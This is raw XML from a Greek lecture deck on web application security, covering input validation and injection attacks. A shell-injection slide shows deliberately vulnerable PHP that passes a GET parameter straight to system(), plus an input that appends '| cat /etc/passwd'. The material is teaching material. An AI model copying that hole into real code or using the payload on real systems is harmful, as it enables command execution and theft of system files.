              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="36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0" lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="3994500" cy="37256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30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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692273" y="1200150"/>
            <a:ext cx="3994500" cy="37256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30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1" name="Shape 21"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4406308"/>
            <a:ext cx="8229600" cy="519599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">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0" lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 7"/>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chemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="45720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example.com/index.php?user=&#8217;Heisenberg" TargetMode="Externa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example.com/index.php?user=&#8217;Heisenberg" TargetMode="Externa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3.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www.evil.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hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.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8.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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www.prueba.hkm&amp;ADDR=216.163.137.3"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hyperlink" Target="http://bieber-fashion.tumblr.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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3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hyperlink" Target="http://ha.ckers.org/weird/CSS-history.cgi" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lcamtuf.coredump.cx/cachetime/"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3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hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-Top_10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-Top_10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-Top_10" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Greece"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449100" y="656275"/>
            <a:ext cx="82458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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ασφάλεια Web εφαρμογών</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1912977"/>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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Σωκράτης Βίδρος (sokratisvidros@gmail.com)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Shape 29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3861125" y="3175275"/>
            <a:ext cx="1421750" cy="142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pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Shape 79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714711" y="181886"/>
            <a:ext cx="5714575" cy="477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411600" y="2169600"/>
            <a:ext cx="8320800" cy="6518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3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Οι εισβολείς είναι παντού.</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Ένας μεγάλος αριθμός web εφαρμογών χρησιμοποιούν μόνο client-side μηχανισμούς για την επικύρωση των δεδομένων εισόδου.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="478790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Οι μηχανισμοί επικύρωσης στην πλευρά του πελάτη παρακάμπτονται εύκολα, αφήνοντας την web εφαρμογή χωρίς καμία προστασία έναντι κακόβουλων αιτημάτων.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Shape 9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000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Unvalidated Input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Επικύρωση για κάθε παράμετρο εισόδου. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="692150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Ιδανικά χρησιμοποιείτε μια κεντρική μονάδα επικύρωσης. Ο κώδικας που εκτελεί τους ελέγχους λειτουργεί πιο αποτελεσματικά αν βρίσκεται σε ένα σημείο.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 10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Η λύση</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Δύο βασικές προσεγγίσεις</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Shape 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295900"/>
            <a:ext cx="8229600" cy="1732499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solid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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Blacklisting</a:t>
            </a:r>
          </a:p>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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	Καθορίστε τι δεν είναι αποδεκτό και επιτρέψτε οτιδήποτε άλλο.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Συναντάται συχνά σε web εφαρμογές.</a:t>
            </a:r>
          </a:p>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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	Επίπονη υλοποίηση αλλά εύκολη παράκαμψη του μηχανισμού.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Shape 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3170000"/>
            <a:ext cx="8229600" cy="1732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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Whitelisting</a:t>
            </a:r>
          </a:p>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	Καθορίστε τι είναι αποδεκτό και απορρίψτε οτιδήποτε άλλο.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Fail safe!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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Injection attacks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Μια web εφαρμογή εκτελεί scripts στον server (Perl, Python, Ruby, PHP, Javascript) έχοντας πρόσβαση σε διάφορους πόρους (βάσεις δεδομένων, σύστημα αρχείων, third party services).</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Το αποτέλεσμα της εκτέλεσης επιστρέφεται στον client.</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Εάν οι παράμετροι του αιτήματος δεν επικυρωθούν σωστά, η εισβολέας μπορεί να παρέμβει και να εκτελέσει τις δικές της εντολές.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 11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Injection Attacks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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Shell injection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1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1304600"/>
            <a:ext cx="51777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&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   $domain = '';</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   if (isset($_GET['domain']))</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>     $domain = $_GET['domain'];</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   system("nslookup " . $domain);</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form method="get"&gt;</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  &lt;input type="domain" name="host" /&gt;</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  &lt;input type="submit" /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Shape 13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Shell injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Shape 131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730450" y="1778261"/>
            <a:ext cx="2999223" cy="1586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idx="4294967295"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Στόχοι</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1132025"/>
            <a:ext cx="8229600" cy="40116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Επίθεση και άμυνα σε web εφαρμογές</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Injection attacks</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Shell injection</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SQL injections</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Blind SQL injections</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XSS</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CSRF, cross-origin, same-origin</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Cookies</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Session hijack</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Clickjacking</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Λογικά σφάλματα</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Shell injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Shape 13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2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Εάν πληκτρολογήσουμε στην φόρμα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'security-class.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>| cat /etc/passwd</a:t>
            </a:r>
            <a:r>
